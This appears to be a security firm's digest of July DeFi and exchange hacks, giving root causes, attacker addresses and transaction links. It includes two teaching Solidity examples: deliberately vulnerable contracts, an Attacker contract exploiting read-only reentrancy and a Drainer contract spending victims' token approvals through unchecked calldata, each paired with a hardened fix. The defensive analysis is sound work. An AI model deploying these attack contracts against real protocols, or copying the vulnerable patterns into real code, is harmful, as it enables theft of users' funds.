July 26
😈On July 26, 2018, the ICO platform KickICO was exploited for ~$7.7M after an attacker obtained a private key and used it to manipulate the KICK token smart contract.
A total of 70,000,000 KickCoins were stolen.
July 25
😈On July 25, 2023, Eralend (@Era_Lend), a decentralized lending protocol on zkSync, was exploited through a read-only reentrancy vulnerability, resulting in the theft of approximately $3.4 million worth of USDC from the protocol.
A vulnerable function in the Eralend smart contract could be called repeatedly within a single transaction, and the attacker did exactly that to manipulate the token prices reported by the project's internal oracle.
The vulnerable code had been copied from a contract belonging to the DEX SyncSwap, and the flaw came along with it. The attacker used flash loans to profit from the manipulated prices of the borrowed assets.
One effective defense against reentrancy is a reentrancy guard, which Eralend's contract was not using at the time of the exploit. Note that for the read-only variant the guard has to cover the price view as well (or the consuming protocol has to check the pool's lock), because the re-entered call is a read, not a write: a guard on the state-changing functions alone does not stop it.
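Below is an added Solidity illustration of the mechanism described in this entry; it is not Eralend's or SyncSwap's code, and every contract, function and number in it is hypothetical. A share-based pool updates its state on both sides of an external call, a lender prices the pool's shares through the pool's own view, and an attacker reads that view from inside the callback. The hardened pool shows the two fixes: finish all effects before the interaction, and make the view refuse to answer while the lock is held.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
// Added illustration; not Eralend's or SyncSwap's code. All names are hypothetical.

// Share-based ETH vault; the spot price of a share is derived from tracked reserves.
contract Pool {
    uint256 public reserveEth;      // ETH the pool believes it holds
    uint256 public totalShares;
    mapping(address => uint256) public shares;
    bool internal locked;

    modifier nonReentrant() {
        require(!locked, "reentrant");
        locked = true;
        _;
        locked = false;
    }

    function deposit() external payable nonReentrant returns (uint256 minted) {
        minted = totalShares == 0 ? msg.value : msg.value * totalShares / reserveEth;
        shares[msg.sender] += minted;
        totalShares += minted;
        reserveEth += msg.value;
    }

    // ETH value of one share, scaled by 1e18. The guard does not cover views, so this
    // can be read by another contract while burn() is suspended inside its ETH send.
    function sharePrice() external view virtual returns (uint256) {
        return reserveEth * 1e18 / totalShares;
    }

    // BUG: totalShares is reduced before the ETH send, reserveEth only after it. While
    // control is with the recipient, sharePrice() divides the old reserve by the new supply.
    function burn(uint256 amount) external virtual nonReentrant {
        uint256 ethOut = reserveEth * amount / totalShares;
        shares[msg.sender] -= amount;
        totalShares -= amount;
        (bool ok, ) = msg.sender.call{value: ethOut}("");   // control leaves the pool here
        require(ok, "send failed");
        reserveEth -= ethOut;
    }
}

// Hardened: all state updates before the external call, and the price view refuses to
// answer while the lock is held, so a consumer can never observe a half-updated pool.
contract HardenedPool is Pool {
    function sharePrice() external view override returns (uint256) {
        require(!locked, "read-only reentrancy");
        return reserveEth * 1e18 / totalShares;
    }

    function burn(uint256 amount) external override nonReentrant {
        uint256 ethOut = reserveEth * amount / totalShares;
        shares[msg.sender] -= amount;
        totalShares -= amount;
        reserveEth -= ethOut;                                // effects first
        (bool ok, ) = msg.sender.call{value: ethOut}("");   // interaction last
        require(ok, "send failed");
    }
}

// Lender that holds pool shares as collateral and prices them with pool.sharePrice().
contract Lender {
    Pool public immutable pool;
    mapping(address => uint256) public collateralShares;
    mapping(address => uint256) public debt;

    constructor(Pool p) { pool = p; }
    receive() external payable {}   // loan liquidity, funded by the deployer

    function depositCollateral() external payable {
        collateralShares[msg.sender] += pool.deposit{value: msg.value}();
    }

    // Lends ETH at 50% LTV against the share price as the pool reports it right now.
    function borrow(uint256 amount) external {
        uint256 value = collateralShares[msg.sender] * pool.sharePrice() / 1e18;
        require(value >= 2 * (debt[msg.sender] + amount), "undercollateralized");
        debt[msg.sender] += amount;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "send failed");
    }
}

// Attacker: lock a small collateral position, burn a much larger direct deposit, and
// borrow from inside the burn callback while the share price is inflated. With 10 ETH
// of collateral and a 90 ETH burn, the callback sees 100 ETH / 10 shares (10x the true
// price) and takes a 50 ETH loan against collateral worth 10 ETH once burn() finishes.
contract Attacker {
    Pool immutable pool;
    Lender immutable lender;
    constructor(Pool p, Lender l) { pool = p; lender = l; }

    function attack() external payable {
        uint256 small = msg.value / 10;
        lender.depositCollateral{value: small}();
        uint256 big = pool.deposit{value: msg.value - small}();
        pool.burn(big);                                   // re-enters receive() below
    }

    receive() external payable {
        if (msg.sender == address(pool)) {               // mid-burn: reserveEth is stale
            uint256 loan = lender.collateralShares(address(this)) * pool.sharePrice() / 2e18;
            lender.borrow(loan);
        }
    }
}
```

Run against Pool, the attacker's borrow succeeds and the lender is left holding 10 ETH of shares against 50 ETH of debt; against HardenedPool the lender's price read reverts on the lock, which makes the whole burn revert, and even without that check the reordered burn leaves no stale state to read. The nonReentrant modifier on burn() by itself changes nothing in the vulnerable version because nothing re-enters burn(): the re-entrant call is the lender's read of sharePrice().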
Re-entrancy Attacks in the Web3 Space
Re-entrancy attacks are still prevalent in the crypto world. In 2024 alone there have been 8 significant crypto exploits in which re-entrancy was used, and there were numerous such attacks before 2024.
Look at the consolidated list of such crypto exploits here:
https://www.immunebytes.com/blog/list-of-re-entrancy-exploits-hacks-in-crypto/
July 24
😈On July 24, 2024, the decentralized exchange and staking platform MonoSwap @monoswapio on the Blast chain was exploited, resulting in a significant loss of approximately 💰$1.3M.
How the Hack Happened
In a post on its X handle, @monoswapio said the exploit began with malware that the attackers got onto a developer's office PC while they were on a call with the developer, posing as venture capitalists (VCs) interested in investing in the MonoSwap protocol.
During the call the developer was sent a phishing link and downloaded a malicious app made to look like KakaoTalk, a mobile messaging app. That app infected the PC, which had access to essentially all MonoSwap-related wallets and contracts.
Once inside, the attackers drained the staked liquidity positions.
The Hack Aftermath
As soon as the hack became known, MonoSwap warned its users against adding liquidity or stakes to their farming pools until the exploit was fixed.
They also advised users to withdraw their staked positions urgently to avoid losing funds in the hack.
The hack is currently being investigated, and MonoSwap will soon release updates about the hack and fund recovery.
The protocol's Total Value Locked (TVL) dropped from approximately $1.5 million to $200,000 as a result of the exploit.
The hacker withdrew funds to the address 0x895a80371fc0e6987e27ddc7aa0e851bc3538ea8 and bridged them to the Ethereum address 0xd30eBC0a9AcdA91d383675EAAB3ff24f06d07eCE.
All of the bridged funds (371 $ETH) were later transferred to Tornado Cash.
How to Avoid Getting Scammed by Crypto Scammers
This article highlights many red flags that can help you identify fraudulent actors in the crypto space.
💡https://immunebytes.com/blog/beginners-guide-phishing-attacks/
Also, read about different types of phishing scams that are prevalent in the Web3 space.
💡https://immunebytes.com/blog/zero-value-token-transfer-phishing-attack/
💡https://immunebytes.com/blog/ice-phishing-what-is-it-and-how-does-it-jeopardize-blockchain-and-web3/
💡https://immunebytes.com/blog/what-is-address-poisoning-how-it-can-result-into-loss-of-crypto-assets/
😈On July 24, 2023, the decentralized exchange @Palmswaporg on the BNB Smart Chain was exploited for ~💰$900k through a smart contract vulnerability.
The Smart Contract Vulnerability
The root cause was a flaw in the calculation used when adding or removing liquidity from the pool.
That calculation determined the exchange rate between USDP (Palm USD) and PLP (Palm LP).
The getAum() function, which computed the PLP price after liquidity removal, depended on the PoolAmount value.
Because of the miscalculation, the PLP price increased every time buyUSDP() was called to buy USDP.
The hacker exploited this by cycling through removing and adding liquidity, profiting from the difference between the two exchange rates.
The analysis showed a buying rate of 1:1 against a selling rate of 1:1.9, which accounts for the ~$900k profit.
Technical Details of the Hack:
Attacker Address: https://bscscan.com/address/0xF84efA8a9F7E68855CF17EAaC9c2f97A9d131366
Victim Contract: https://bscscan.com/address/0x55252A6D50BFAd0E5F1009541284c783686F7f25
Exploit Transaction: https://bscscan.com/tx/0x62dba55054fa628845fecded658ff5b1ec1c5823f1a5e0118601aa455a30eac9
July 18
😈In a major security breach on July 18, 2024, @WazirXIndia, one of the largest cryptocurrency exchanges in India, was hacked for ~💰$234M.
As per the official release by WazirX India, the breach happened in one of its multisig wallets.
WazirX India is currently conducting a thorough investigation into the hack. To contain the damage caused by the exploit, the INR and crypto withdrawals have been temporarily paused.
The exploiter’s address involved in the exploit is reportedly funded by Tornado Cash.
To obfuscate the stolen funds trail, the exploiter has transferred stolen assets to multiple addresses before swapping them for Ethereum (ETH) using Uniswap.
The swapped crypto assets include $PEPE, $GALA, and $USDT.
The exploiter continues to move funds to multiple addresses even at the time of reporting this.
List of Stolen Tokens with Their Value
https://bit.ly/3Y9vOqN
Victim Address:
https://etherscan.io/address/0x27fd43babfbe83a81d14665b1a6fb8030a60c9b4
Hacker Address:
https://etherscan.io/address/0x04b21735E93Fa3f8df70e2Da89e6922616891a88
😈Other Malicious Addresses Used for Stolen Fund Movement
https://etherscan.io/address/0x35febC10112302e0d69F35F42cCe85816f8745CA (WazirX Exploiter 2)
https://etherscan.io/address/0x90ca792206eD7Ee9bc9da0d0dF981FC5619F91Fd (WazirX Exploiter 3)
https://etherscan.io/address/0x90ca571a31e9a61c2834c991051917dfa45091fd
https://etherscan.io/address/0x90ca621f8247142ae002e1b180d032dec79f91fd
July 16
😈On July 16, 2024, @lifiprotocol was exploited to steal ~💰$9.7M worth of crypto assets on the Ethereum and Arbitrum chains.
The lost funds include $USDC, $USDT, and $DAI. In an official release, the @lifiprotocol team asked users to revoke approvals granted to the following contracts to prevent their funds from being drained:
- 0x1231deb6f5749ef6ce6943a275a1d3e7486f4eae
- 0x341e94069f53234fE6DabeF707aD424830525715
- 0xDE1E598b81620773454588B85D6b5D4eEC32573e
- 0x24ca98fB6972F5eE05f0dB00595c7f68D9FaFd68
The Root Cause
The root cause was an unchecked external call in the LI.FI bridge.
The depositToGasZipERC20 function in the GasZipFacet module, which swaps the specified tokens and deposits them into the GasZip contract, did not validate the data it passed to its external call. Whoever supplied that data could therefore have the facet execute arbitrary calls in its own name, including calls that spend the allowances users had granted to it.
This allowed the attacker to drain the wallets of users who had manually set infinite approvals on the vulnerable contracts.
The affected GasZipFacet module was reportedly deployed only five days before the exploit.
🚨Not the First Hack!
On March 20, 2022, @lifiprotocol lost ~$600K to a similar vulnerability in the LI.FI smart contract. Why the current vulnerability was not caught in the various security audits the project has undergone since is a question only @lifiprotocol can answer.
💡Ref. https://blog.li.fi/20th-march-the-exploit-e9e1c5c03eb9
The Stolen Funds Include:
- 60,715 Tether: USDT Stablecoin
- 55,001 Circle: USDC Token
- 74,795 Tether: USDT Stablecoin
- 49,820.78 Tether: USDT Stablecoin
- 48,217.283218 Circle: USDC Token
- 43,669.373674 Circle: USDC Token
- 43,166.669857 Circle: USDC Token
- 41,610.765269 Circle: USDC Token
Technical Details of the Hack
Attacker:
https://etherscan.io/address/0x8b3cb6bf982798fba233bca56749e22eec42dcf3
Attack contract:
https://etherscan.io/address/0x32d8c3b3f1496f56a74fd001b58a67036d4dfea4
Target contract:
https://etherscan.io/address/0x1231deb6f5749ef6ce6943a275a1d3e7486f4eae (LiFiDiamond)
Attack Txn:
https://etherscan.io/tx/0xa63052e97b989eecd789b76f670d6a5ed8a72334ce99831a36d7a642b087537f
July 14
😈On July 14, 2024, the cryptocurrency lending protocol @Minterest on the #Mantle chain was exploited for ~💰$1.4M.
The hack investigation is currently underway to uncover the reasons behind the exploit.
Meanwhile, Minterest has temporarily paused its “Supply & Borrow” and “Repay & Withdraw” services to investigate and contain the hack.
The attacker was initially funded by the infamous @TornadoCash on the #ETH chain.
As per the last update, the hacker has bridged the stolen funds (~428 ETH) to #ETH.
Stolen Funds:
The exploiter moved the stolen funds to the following two contract addresses:
👉https://mantlescan.xyz/address/0xf7628d84a2bbd9bb9c8e686ac95bb5d55169f3f1
👉https://mantlescan.xyz/address/0x4c1d3fc3fc3c177c3b633427c2f769276c547463
Was Minterest Ever Audited?
According to a post on the official blog dated November 8, 2023, the protocol had undergone 7 security audits by 4 different audit firms.
Blog Ref: https://minterest.com/blog/minterest-passes-fourth-zokyo-audit/
Once the detailed hack analysis is released and shared with the community, it will be known whether this was an insider job, compromised keys, or a smart contract vulnerability.
Technical Details of the Hack
Hacker Address: https://mantlescan.xyz/address/0x618F768aF6291705Eb13E0B2E96600b3851911D1
Txn hash: https://mantlescan.xyz/tx/0xb3c4c313a8d3e2843c9e6e313b199d7339211cdc70c2eca9f4d88b1e155fd6bd
Exploited Contract
https://mantlescan.xyz/address/0x9b506584a0f2176494d5f9c858437b54df97bc06
July 13
😈On July 13, 2022, @space_godzilla on the BSC chain was exploited for ~$25.3K in a flash loan attack that leveraged a vulnerability in the contract's swapAndLiquifyStepv1() function.
July 12
😈On July 12, 2024, the DeFi protocol @DoughFina on the #Ethereum chain was exploited for ~💰$1.8M worth of crypto assets.
@DoughFina has already acknowledged the hack through its official X handle.
Although the investigation is still underway, the likely cause is an access control vulnerability involving unvalidated calldata in the ConnectorDeleverageParaswap contract.
💡Learn more about Access Control Vulnerabilities in smart contracts here:
https://immunebytes.com/blog/access-control-vulnerabilities-in-solidity-smart-contracts/
The attacker was initially funded through #Railgun, and at the time of this report, the hacker has already swapped all stolen $USDC into $ETH.
💡Railgun and Tornado Cash are not the only tools hackers use to obfuscate the trail of stolen funds. See other tools:
https://immunebytes.com/blog/top-tornado-cash-alternatives-in-2024/
Efforts of Fund Recovery
The @DoughFina team has sent an on-chain message to the hacker in a bid to open a negotiation channel and discuss the return of the stolen funds.
The message asks the hacker to cooperate and return the funds by July 15, 2024, 23:00 UTC, failing which the hacker would face legal action.
On-chain message txn:
https://etherscan.io/tx/0x38ad3247c6420518c829ff1163c36cd564de5a72b1eaf800437827365e6c4e85
Stolen funds are currently parked at https://etherscan.io/address/0x2913d90d94c9833b11a3e77f136da03075c04a0f
Technical Details of the Hack
Attacker:
https://etherscan.io/address/0x67104175fc5fabbdb5a1876c3914e04b94c71741
Attack contract:
https://etherscan.io/address/0x11a8dc866c5d03ff06bb74565b6575537b215978
Target contract:
https://etherscan.io/address/0x9f54e8eaa9658316bb8006e03fff1cb191aafbe6
Attack transaction:
https://etherscan.io/tx/0x92cdcc732eebf47200ea56123716e337f6ef7d5ad714a2295794fdc6031ebb2e
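The pattern this entry and the LI.FI entry above (July 16) both describe, a contract that forwards caller-supplied calldata in an external call, is shown below as an added Solidity example. It is not Dough Finance's or LI.FI's code, and the contract and function names are hypothetical: a minimal swap-and-deposit facet that forwards whatever it is given, the attacker's call that turns it into a drain of other users' approvals, and a hardened facet that decides the target and function itself.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
// Added illustration of the "unchecked external call data" pattern; not LI.FI's or
// Dough Finance's code. All contract and function names are hypothetical.

interface IERC20 {
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
    function approve(address spender, uint256 amount) external returns (bool);
}

// VULNERABLE: a swap-and-deposit helper that forwards a caller-supplied target and
// calldata. The forwarded call runs with msg.sender == this contract, so every allowance
// users ever granted to it is spendable by whoever supplies the calldata.
contract VulnerableFacet {
    function swapAndDeposit(address target, bytes calldata data) external payable {
        (bool ok, ) = target.call{value: msg.value}(data);
        require(ok, "swap failed");
        // ... would go on to deposit the swapped tokens ...
    }
}

// What the attacker submits: no bug in the token and none in the victim's wallet, just
// transferFrom(victim, attacker, amount) executed by the contract the victim approved.
contract Drainer {
    function drain(VulnerableFacet facet, IERC20 token, address victim, uint256 amount) external {
        facet.swapAndDeposit(
            address(token),
            abi.encodeCall(IERC20.transferFrom, (victim, msg.sender, amount))
        );
    }
}

// HARDENED: the contract, not the caller, decides which targets and which functions may
// be called, refuses token contracts as targets outright, and only ever moves the
// caller's own tokens, for the amount the caller passed to this call.
contract HardenedFacet {
    address public immutable owner;
    mapping(address => bool) public allowedTarget;      // vetted DEX / aggregator routers
    mapping(address => bool) public isToken;            // contracts users approve: never a target
    mapping(bytes4 => bool) public allowedSelector;     // vetted swap entry points only

    constructor() { owner = msg.sender; }
    modifier onlyOwner() { require(msg.sender == owner, "not owner"); _; }
    function setTarget(address t, bool ok) external onlyOwner { allowedTarget[t] = ok; }
    function setToken(address t, bool ok) external onlyOwner { isToken[t] = ok; }
    function setSelector(bytes4 s, bool ok) external onlyOwner { allowedSelector[s] = ok; }

    function swapAndDeposit(IERC20 tokenIn, uint256 amountIn, address target, bytes calldata data)
        external
    {
        require(allowedTarget[target] && !isToken[target], "target not allowed");
        require(data.length >= 4 && allowedSelector[bytes4(data[:4])], "selector not allowed");
        // Pull only from msg.sender, only the amount they passed for this call.
        require(tokenIn.transferFrom(msg.sender, address(this), amountIn), "pull failed");
        // One-shot allowance for exactly this amount, revoked again after the swap.
        require(tokenIn.approve(target, amountIn), "approve failed");
        (bool ok, ) = target.call(data);
        require(ok, "swap failed");
        require(tokenIn.approve(target, 0), "revoke failed");
        // ... deposit the swapped tokens ...
    }
}
```

The allowlist is the part that matters: the caller must never choose the target, and a token contract that users have approved must never be a legal target, otherwise the router becomes a proxy for their allowances. On the user side the exposure is the allowance itself, which is what the revoke advice in the LI.FI entry amounts to: `allowance(user, facet)` shows what is at risk and `approve(facet, 0)` removes it.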
July 10
😈On July 10, 2022, the Omni Protocol, a decentralized finance (DeFi) platform, was compromised in a significant security breach.
The exploit resulted in the loss of approximately 💰$1.4 million worth of cryptocurrency.
Reason for the Hack
The hack occurred due to a reentrancy vulnerability in Omni Protocol’s smart contract code.
Reentrancy attacks exploit the way smart contracts handle external calls, allowing an attacker to repeatedly call a function before the initial execution is complete.
This specific vulnerability was not adequately addressed in the contract’s logic, leaving it open to exploitation.
Reentrancy has been used in hundreds of crypto hacks. Here is the list of all such hacks:
⬇️https://immunebytes.com/blog/list-of-re-entrancy-exploits-hacks-in-crypto/
Attack Flow
- Identification of Vulnerability: The attacker identified a reentrancy vulnerability in one of the Omni Protocol’s smart contracts. This vulnerability allowed the attacker to call a function repeatedly before the contract’s state was updated.
- Deploying Malicious Contract: The attacker deployed a malicious contract designed to exploit the vulnerability. This contract interacted with the vulnerable Omni Protocol contract.
- Initiating the Attack: The attacker initiated a withdrawal function from the Omni Protocol. The vulnerable contract transferred funds to the attacker’s contract before updating its own balance.
- Reentrancy Exploit: Taking advantage of the reentrancy bug, the attacker’s contract made recursive calls to the withdrawal function. Since the vulnerable contract had not yet updated its balance, it continued to transfer funds to the attacker’s contract.
- Draining Funds: The attacker repeated this process multiple times within a single transaction, rapidly draining funds from the Omni Protocol.
July 2
😈On July 2, 2024, the WMRP token contract on the #BNB chain was exploited for 103 BNB worth ~💰$58k.
The attacker manipulated the price of MRP through a reentrancy attack.
The detailed hack analysis is underway, but executing crypto exploits through reentrancy is nothing new.
Look at the list of crypto hacks conducted using reentrancy in the history of Web3:
💡https://immunebytes.com/blog/list-of-re-entrancy-exploits-hacks-in-crypto/
Technical Details
Attacker:
https://bscscan.com/address/0x132d9bbdbe718365af6cc9e43bac109a9a53b138
Attack contract:
https://bscscan.com/address/0x2bd8980a925e6f5a910be8cc0ad1cff663e62d9d
Target contract:
https://bscscan.com/address/0x35f5cef517317694df8c50c894080caa8c92af7d
Exploit Txn:
https://bscscan.com/tx/0x4353a6d37e95a0844f511f0ea9300ef3081130b24f0cf7a4bd1cae26ec393101